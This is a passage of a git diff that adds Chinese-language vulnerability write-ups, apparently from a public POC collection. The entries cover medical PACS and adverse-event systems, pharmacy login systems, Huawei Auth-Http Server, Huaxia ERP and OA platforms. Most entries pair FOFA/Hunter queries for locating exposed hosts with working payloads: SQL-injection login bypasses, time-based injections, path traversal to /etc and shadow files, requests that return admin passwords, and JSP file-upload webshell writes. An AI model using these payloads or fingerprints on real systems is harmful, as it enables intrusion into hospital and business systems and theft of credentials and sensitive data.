+北京新网医讯技术有限公司，公司成立于2000年3月，注册于北京中关村科技园，为国家高新技术企业和中关村高新技术企业（简称为“双高企业”），公司作为软件企业，成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS（放射科信息管理系统）的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞，攻击者可通过该漏洞绕过身份认证进入系统后台。
+
+# 二、影响版本
++ 北京新网医讯技术有限公司PACS系统web端
+
+# 三、特征/
+![1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd.png](./img/iGYBrATs1WBZWb9e/1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd-062607.png)
+
+# 四、漏洞复现
+```plain
+用户名：admin' or '1'='1' --+   
+密码：任意
+```
+
+![1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a.png](./img/iGYBrATs1WBZWb9e/1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a-136123.png)
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kxcuo6orgybzgrau>
\ No newline at end of file
diff --git a/北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞.md b/北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞.md
new file mode 100644
index 0000000..922df87
--- /dev/null
+++ b/北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞.md
@@ -0,0 +1,24 @@
+# 北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞
+
+# 一、漏洞简介
+北京新网医讯技术有限公司，公司成立于2000年3月，注册于北京中关村科技园，为国家高新技术企业和中关村高新技术企业（简称为“双高企业”），公司作为软件企业，成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS（放射科信息管理系统）的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞，攻击者可通过该漏洞绕过身份认证进入系统后台。
+
+# 二、影响版本
++ 北京新网医讯技术有限公司PACS系统web端
+
+# 三、特征
+![1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd.png](./img/3n2XzVVsd5eppHKf/1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd-047803.png)
+
+# 四、漏洞复现
+访问如下url可绕过身份认证直接进入系统后台
+
+```plain
+/ClinicList.aspx
+```
+
+![1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a.png](./img/3n2XzVVsd5eppHKf/1700663454600-5e8b6f4d-383c-490b-b918-104e4bdc237a-468929.png)
+
+
+
+> 更新: 2024-03-04 10:08:55  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wgez6o568rpccb1f>
\ No newline at end of file
diff --git a/北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞.md b/北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞.md
new file mode 100644
index 0000000..08c807e
--- /dev/null
+++ b/北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞.md
@@ -0,0 +1,26 @@
+# 北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞
+
+# 一、漏洞简介
+北京新网医讯技术有限公司，公司成立于2000年3月，注册于北京中关村科技园，为国家高新技术企业和中关村高新技术企业（简称为“双高企业”），公司作为软件企业，成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS（放射科信息管理系统）的研究、开发工作。北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞。
+
+# 二、影响版本
++ 北京新网医讯技术有限公司云端客服管理系统
+
+# 三、资产测绘
++ hunter`web.body="云端客服管理平台登录"`
++ 特征
+
+![1709787073905-2d7599e1-7cfb-4312-b2d8-f6be71af0784.png](./img/Y_MNc902yW0PgTrR/1709787073905-2d7599e1-7cfb-4312-b2d8-f6be71af0784-095232.png)
+
+# 四、漏洞复现
+```plain
+用户名:admin' or '1'='1' --+
+密码：任意
+```
+
+![1709787140518-981e086c-2809-4e9f-b235-f5d9f64cde2f.png](./img/Y_MNc902yW0PgTrR/1709787140518-981e086c-2809-4e9f-b235-f5d9f64cde2f-999549.png)
+
+
+
+> 更新: 2024-04-20 22:06:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mh17k2gha1lqa0on>
\ No newline at end of file
diff --git a/北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md b/北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md
new file mode 100644
index 0000000..d7b1135
--- /dev/null
+++ b/北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md
@@ -0,0 +1,25 @@
+# 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞
+
+# 一、漏洞简介
+北京雷石天地电子技术有限公司是一家从事现代宽带技术领域和信息家电领域中嵌入式系统软件的研究与开发应用的公司。 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞，攻击者可利用该漏洞获取敏感信息。
+
+# 二、影响版本
++ 云视频管理系统
+
+# 三、资产测绘
++ hunter`web.body="/mediaimport/getIsAddData"`
++ 特征
+
+![1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1.png](./img/8yIVQ8yg93MZfzTM/1703061796364-b7ca13da-00a7-4258-b1bc-3ed6412512f1-706309.png)
+
+# 四、漏洞复现
+```java
+/servers/listdir?path=../../../../../../etc
+```
+
+![1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6.png](./img/8yIVQ8yg93MZfzTM/1703061827191-4bf747a7-ebef-4269-9eb8-6e5eb326c5a6-211600.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy632nmy8tt4g795>
\ No newline at end of file
diff --git a/医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞.md b/医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞.md
new file mode 100644
index 0000000..64cda2f
--- /dev/null
+++ b/医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞.md
@@ -0,0 +1,40 @@
+# 医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞
+
+# 一、漏洞简介
+鱼尾巴科技专注于医疗质控,为医院提供完整医疗质量解决方案,按照国家卫健委评审标准和中国医院质量安全管理标准,研发了医院等级评审系统、医疗安全(不良)事件报告系统、不良事件管理系统等。其中旗下医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞，通过该漏洞可获取管理员明文密码进入后台。
+
+# 二、影响版本
++ 医疗安全(不良)事件报告系统
+
+# 三、资产测绘
++ fofa`body="koma.Application"`
++ 特征
+
+![1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63.png](./img/tu4oTq5Iw6KAViO2/1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63-530940.png)
+
+# 四、漏洞复现
+```plain
+POST /services/members HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: JSESSIONID=E24C32CE389D5D5C83F3648A394B8A5E
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+
+{"method":"fetch","params":{"service":"membersbyid","members":["admin"]}}
+```
+
+![1721307770067-084b58bd-b8ea-455d-9816-b0a136ec2621.png](./img/tu4oTq5Iw6KAViO2/1721307770067-084b58bd-b8ea-455d-9816-b0a136ec2621-291163.png)
+
+![1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954.png](./img/tu4oTq5Iw6KAViO2/1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954-576182.png)
+
+
+
+> 更新: 2024-10-22 09:37:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zfcngaidiyc37nzg>
\ No newline at end of file
diff --git a/医疗安全(不良)事件报告系统members存在信息泄露漏洞.md b/医疗安全(不良)事件报告系统members存在信息泄露漏洞.md
new file mode 100644
index 0000000..83b60fd
--- /dev/null
+++ b/医疗安全(不良)事件报告系统members存在信息泄露漏洞.md
@@ -0,0 +1,36 @@
+# 医疗安全(不良)事件报告系统members存在信息泄露漏洞
+
+# 一、漏洞简介
+鱼尾巴科技专注于医疗质控,为医院提供完整医疗质量解决方案,按照国家卫健委评审标准和中国医院质量安全管理标准,研发了医院等级评审系统、医疗安全(不良)事件报告系统、不良事件管理系统等。其中旗下医疗安全(不良)事件报告系统members存在信息泄露漏洞，通过该漏洞可获取管理员明文密码进入后台。
+
+# 二、影响版本
++ 医疗安全(不良)事件报告系统
+
+# 三、资产测绘
++ fofa`body="koma.Application"`
++ 特征
+
+![1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63.png](./img/jhNzbDrLMxpLCf20/1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63-247254.png)
+
+# 四、漏洞复现
+```plain
+POST /services/members HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-dctech-json-rpc
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
+Priority: u=0
+Content-Length: 66
+
+{"method":"fetch","params":{"service":"members","user_class":""}}
+```
+
+![1721307742396-a938cb64-2d51-45ff-8628-d7c7d525611b.png](./img/jhNzbDrLMxpLCf20/1721307742396-a938cb64-2d51-45ff-8628-d7c7d525611b-362515.png)![1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954.png](./img/jhNzbDrLMxpLCf20/1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954-802866.png)
+
+
+
+> 更新: 2024-10-22 09:37:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/svb01mcl3q5d1dwx>
\ No newline at end of file
diff --git a/医药公司登录系统GetLshByTj存在SQL注入漏洞.md b/医药公司登录系统GetLshByTj存在SQL注入漏洞.md
new file mode 100644
index 0000000..ca8f2d1
--- /dev/null
+++ b/医药公司登录系统GetLshByTj存在SQL注入漏洞.md
@@ -0,0 +1,82 @@
+# 医药公司登录系统GetLshByTj存在SQL注入漏洞
+
+# 一、漏洞简介
+医药公司登录系统是一个全面且高效的管理工具，涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式，并具备完善的客户档案管理功能，包括客户的基本信息、经营权限等。此外，系统还提供国药标准药品字典库云下载功能，便于用户快速获取药品信息。整体而言，医药公司登录系统通过自动化的管理和数据分析，帮助医药企业优化业务流程，提升市场竞争力。
+
+# 二、影响版本
++ 医药公司登录系统
+
+# 三、资产测绘
++ fofa`body="ResourceScripts/zh-cn-Login.aspx.js"`
+
+![1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a.png](./img/YJr-f544KP8rikO0/1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a-267631.png)
+
+# 四、漏洞复现
+```java
+POST /WebService.asmx HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: _sid=tp_1700221267_fbf3ff64ee297b12
+Upgrade-Insecure-Requests: 1
+Priority: u=1
+SOAPAction: http://tempuri.org/GetLshByTj
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 454
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <tem:GetLshByTj>
+         <!--type: string-->
+         <tem:tjstr>gero et</tem:tjstr>
+         <!--type: string-->
+         <tem:djcname>onoras imperio';WAITFOR DELAY '0:0:5'--</tem:djcname>
+         <!--type: boolean-->
+         <tem:redonly>true</tem:redonly>
+      </tem:GetLshByTj>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1718692030456-63586960-4583-46f0-826d-701762b755e0.png](./img/YJr-f544KP8rikO0/1718692030456-63586960-4583-46f0-826d-701762b755e0-777595.png)
+
+```java
+POST /WebService.asmx HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: _sid=tp_1700221267_fbf3ff64ee297b12
+Upgrade-Insecure-Requests: 1
+Priority: u=1
+SOAPAction: http://tempuri.org/GetLshByTj
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 478
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <tem:GetLshByTj>
+         <!--type: string-->
+         <tem:tjstr>gero et</tem:tjstr>
+         <!--type: string-->
+         <tem:djcname>onoras imperio</tem:djcname>
+         <!--type: boolean-->
+         <tem:redonly>true</tem:redonly>
+      </tem:GetLshByTj>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1718692048095-bbd1d173-eb00-4cd1-9589-c26ed768f0fd.png](./img/YJr-f544KP8rikO0/1718692048095-bbd1d173-eb00-4cd1-9589-c26ed768f0fd-644411.png)
+
+
+
+> 更新: 2024-06-23 23:40:49  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ffth09eureon16c6>
\ No newline at end of file
diff --git a/医药公司登录系统Login存在SQL注入漏洞.md b/医药公司登录系统Login存在SQL注入漏洞.md
new file mode 100644
index 0000000..049b584
--- /dev/null
+++ b/医药公司登录系统Login存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 医药公司登录系统Login存在SQL注入漏洞
+
+# 一、漏洞简介
+医药公司登录系统是一个全面且高效的管理工具，涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式，并具备完善的客户档案管理功能，包括客户的基本信息、经营权限等。此外，系统还提供国药标准药品字典库云下载功能，便于用户快速获取药品信息。整体而言，医药公司登录系统通过自动化的管理和数据分析，帮助医药企业优化业务流程，提升市场竞争力。
+
+# 二、影响版本
++ 医药公司登录系统
+
+# 三、资产测绘
++ fofa`body="ResourceScripts/zh-cn-Login.aspx.js"`
+
+![1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a.png](./img/Zh-OJkFeum4RXVH1/1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a-439620.png)
+
+# 四、漏洞复现
+```http
+POST /Login.aspx/CheckUser HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Content-Type: application/json; charset=utf-8
+Priority: u=1
+
+{"value":"' waitfor delay '0:0:5'--+"}
+```
+
+![1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420.png](./img/Zh-OJkFeum4RXVH1/1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420-413034.png)
+
+
+
+> 更新: 2024-06-23 23:40:49  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nttl3oy8wgueg1gq>
\ No newline at end of file
diff --git a/医药公司登录系统存在SQL注入漏洞.md b/医药公司登录系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..67c4d66
--- /dev/null
+++ b/医药公司登录系统存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 医药公司登录系统存在SQL注入漏洞
+
+# 一、漏洞简介
+医药公司登录系统是一个全面且高效的管理工具，涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式，并具备完善的客户档案管理功能，包括客户的基本信息、经营权限等。此外，系统还提供国药标准药品字典库云下载功能，便于用户快速获取药品信息。整体而言，医药公司登录系统通过自动化的管理和数据分析，帮助医药企业优化业务流程，提升市场竞争力。
+
+# 二、影响版本
++ 医药公司登录系统
+
+# 三、资产测绘
++ fofa`body="ResourceScripts/zh-cn-Login.aspx.js"`
+
+![1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a.png](./img/ozPPteBCOVE52AVP/1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a-788714.png)
+
+# 四、漏洞复现
+```http
+POST /Login.aspx/CheckUser HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Content-Type: application/json; charset=utf-8
+Priority: u=1
+
+{"value":"' waitfor delay '0:0:5'--+"}
+```
+
+![1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420.png](./img/ozPPteBCOVE52AVP/1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420-062181.png)
+
+
+
+> 更新: 2024-06-17 09:24:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fq92t7qp61yzgzp1>
\ No newline at end of file
diff --git a/华为Auth-Http-Serve任意文件读取.md b/华为Auth-Http-Serve任意文件读取.md
new file mode 100644
index 0000000..c18771a
--- /dev/null
+++ b/华为Auth-Http-Serve任意文件读取.md
@@ -0,0 +1,14 @@
+
+## 华为Auth-Http Serve任意文件读取
+华为Auth-Http服务,华为Auth-Http Server是一款安全认证服务器，在提供安全的远程登录和网络资源访问控制。支持多种认证方式和协议AAA、Radius、TACACS+等，可以实现用户身份认证、授权和审计等功能。同时，可广泛应用于企业、政府、教育等行业的安全架构中。华为Auth-Http Server 1.0任意文件读取，攻击者可通过该漏洞读取任意文件
+## fofa
+```
+server="Huawei Auth-Http Server 1.0"
+```
+
+## POC
+```
+/umweb/shadow
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/6e52e737-0076-4630-9d6f-a9f0a355b549)
diff --git a/华为Auth-HttpServer1.0存在任意文件读取.md b/华为Auth-HttpServer1.0存在任意文件读取.md
new file mode 100644
index 0000000..d747c46
--- /dev/null
+++ b/华为Auth-HttpServer1.0存在任意文件读取.md
@@ -0,0 +1,25 @@
+# 华为Auth-Http Server 1.0存在任意文件读取
+
+# 一、漏洞简介
+华为Auth-Http Server 1.0存在任意文件读取漏洞
+
+# 二、影响版本
++ 华为Auth-Http Server 1.0
+
+# 三、资产测绘
++ fofa`server="Huawei Auth-Http Server 1.0"`
++ 特征
+
+![1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e.png](./img/awN0FrlYIE9HHmOb/1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e-662211.png)
+
+## 四、漏洞复现
+```plain
+/umweb/shadow
+```
+
+![1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a.png](./img/awN0FrlYIE9HHmOb/1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a-439777.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idyr2darqkc3u2m2>
\ No newline at end of file
diff --git a/华夏ERPV3.3存在信息泄漏漏洞.md b/华夏ERPV3.3存在信息泄漏漏洞.md
new file mode 100644
index 0000000..45cb508
--- /dev/null
+++ b/华夏ERPV3.3存在信息泄漏漏洞.md
@@ -0,0 +1,24 @@
+# 华夏ERPV3.3存在信息泄漏漏洞
+
+华夏ERPV3.3存在信息泄漏漏洞，可获取用户敏感信息。
+
+## hunter
+
+```yaml
+web.icon=="f6efcd53ba2b07d67ab993073c238a11"
+```
+
+## poc
+
+```java
+GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/c12Frd6hp0a3r8A9-lVr-g
\ No newline at end of file
diff --git a/华夏ERPgetAllList存在信息泄露漏洞.md b/华夏ERPgetAllList存在信息泄露漏洞.md
new file mode 100644
index 0000000..e7f196e
--- /dev/null
+++ b/华夏ERPgetAllList存在信息泄露漏洞.md
@@ -0,0 +1,37 @@
+# 华夏ERP getAllList存在信息泄露漏洞
+
+# 一、漏洞简介
+jshERP立志为中小企业提供开源好用的ERP软件，降低企业的信息化成本，目前专注进销存+财务功能。主要模块有零售管理、入库管理、出库管理、组装拆卸、财务管理、报表查询、基础数据、系统管理等。支持预付款、收入支出、仓库调拨、采购销售、礼品卡等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面，精确到每个按钮和菜单。该系统存在敏感信息泄露漏洞，通过此漏洞攻击者可以获取系统用户，登录用户名，密码，职位等个人敏感信息。
+
+# 二、影响版本
++ jshERP
+
+# 三、资产测绘
++ Hunter`web.body="jshERP"`
++ 特征
+
+![1704276326167-84de47c7-5c90-4441-9814-5a3cbf02f2f6.png](./img/taahvRvbAHDcrLXX/1704276326167-84de47c7-5c90-4441-9814-5a3cbf02f2f6-359942.png)
+
+# 四、漏洞复现
+```plain
+GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704276087; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704276315
+Upgrade-Insecure-Requests: 1
+```
+
+![1704276423442-010d25cc-0516-4888-985c-fc04aa5c1904.png](./img/taahvRvbAHDcrLXX/1704276423442-010d25cc-0516-4888-985c-fc04aa5c1904-335255.png)
+
+解密即可登录
+
+![1704276460771-27d3c0fa-c153-490e-8592-0e2c6390e581.png](./img/taahvRvbAHDcrLXX/1704276460771-27d3c0fa-c153-490e-8592-0e2c6390e581-927135.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/grwzu7s9grkulo1a>
\ No newline at end of file
diff --git a/华夏ERP敏感信息泄漏漏洞（CNVD-2020-63964）.md b/华夏ERP敏感信息泄漏漏洞（CNVD-2020-63964）.md
new file mode 100644
index 0000000..31c2556
--- /dev/null
+++ b/华夏ERP敏感信息泄漏漏洞（CNVD-2020-63964）.md
@@ -0,0 +1,33 @@
+# 华夏ERP敏感信息泄漏漏洞（CNVD-2020-63964）
+
+# 一、漏洞简介
+华夏ERP基于SpringBoot框架、SaaS模式，立志为中小企业提供开源好用的ERP软件，目前专注进销存+财务功能。 华夏ERP系统存在敏感信息漏洞，攻击者可利用该漏洞获取敏感信息。
+
+# 二、影响版本
++ 华夏ERP
+
+# 三、资产测绘
++ hunter`web.body="jshERP-boot"`
++ 登录页面
+
+![1693580405514-b7fa6757-7b89-4293-9e70-534cdf8001b4.png](./img/okq7OrqZU_vpgIqS/1693580405514-b7fa6757-7b89-4293-9e70-534cdf8001b4-288811.png)
+
+# 四、漏洞复现
+```java
+GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1693579975; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1693580257
+Upgrade-Insecure-Requests: 1
+```
+
+![1693580565498-ff5668d8-7ece-45cf-bcec-abd1d6a81636.png](./img/okq7OrqZU_vpgIqS/1693580565498-ff5668d8-7ece-45cf-bcec-abd1d6a81636-684436.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wtdceob1qqhc24yg>
\ No newline at end of file
diff --git a/华夏通讯录存在前台upload任意文件上传.md b/华夏通讯录存在前台upload任意文件上传.md
new file mode 100644
index 0000000..dee570c
--- /dev/null
+++ b/华夏通讯录存在前台upload任意文件上传.md
@@ -0,0 +1,32 @@
+# 华夏通讯录存在前台upload任意文件上传
+
+华夏通讯录存在前台由于在鉴权方面存在疏漏，导致了可未授权访问，从而通过/admin/common/upload接口进行任意文件上传。
+
+## fofa
+
+```javascript
+icon_hash="1403225079" && ":) APPV1"
+```
+
+## poc
+
+```javascript
+POST /admin/common/upload HTTP/2
+Host: 127.0.0.1
+Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Length: 218
+
+-----------------------------289666258334735365651210512949
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/png
+
+1111
+-----------------------------289666258334735365651210512949--
+```
+路径返回包中
+![image](https://github.com/user-attachments/assets/96615f38-3cf9-44d9-ba76-85fae0f45b31)
+
diff --git a/华天动力OA系统upload.jsp任意文件上传漏洞.md b/华天动力OA系统upload.jsp任意文件上传漏洞.md
new file mode 100644
index 0000000..32d9c17
--- /dev/null
+++ b/华天动力OA系统upload.jsp任意文件上传漏洞.md
@@ -0,0 +1,59 @@
+# 华天动力OA系统upload.jsp任意文件上传漏洞
+
+华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在任意文件上传漏洞，攻击者可以上传任意文件，获取webshell，控制服务器权限，读取敏感信息等。
+
+## fofa
+
+```yaml
+body="/OAapp/WebObjects/OAapp.woa" || body="/OAapp/htpages/app"
+```
+
+## poc
+
+获取绝对路径
+
+```java
+POST /OAapp/jsp/upload.jsp HTTP/1.1
+Host: x.x.x.x:xx
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 293
+
+------WebKitFormBoundary5Ur8laykKAWws2QO
+Content-Disposition: form-data; name="file"; filename="xxx.xml"
+Content-Type: image/png
+
+real path
+------WebKitFormBoundary5Ur8laykKAWws2QO
+Content-Disposition: form-data; name="filename"
+
+xxx.png
+------WebKitFormBoundary5Ur8laykKAWws2QO--
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281028921.webp)
+
+将“123”写入到normalLoginPageForOther.jsp文件中去
+
+```javascript
+POST /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp HTTP/1.1
+Host: x.x.x.x:xx
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 389
+
+------WebKitFormBoundaryzRSYXfFlXqk6btQm
+Content-Disposition: form-data; name="EDITFILE"; filename="xxx.txt"
+Content-Type: image/png
+
+<%out.print("123");%>
+------WebKitFormBoundaryzRSYXfFlXqk6btQm
+Content-Disposition: form-data; name="newFileName"
+
+D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
+------WebKitFormBoundaryzRSYXfFlXqk6btQm--
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281029565.webp)
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281029962.webp)
diff --git a/华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md b/华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md
new file mode 100644
index 0000000..3dbdefc
--- /dev/null
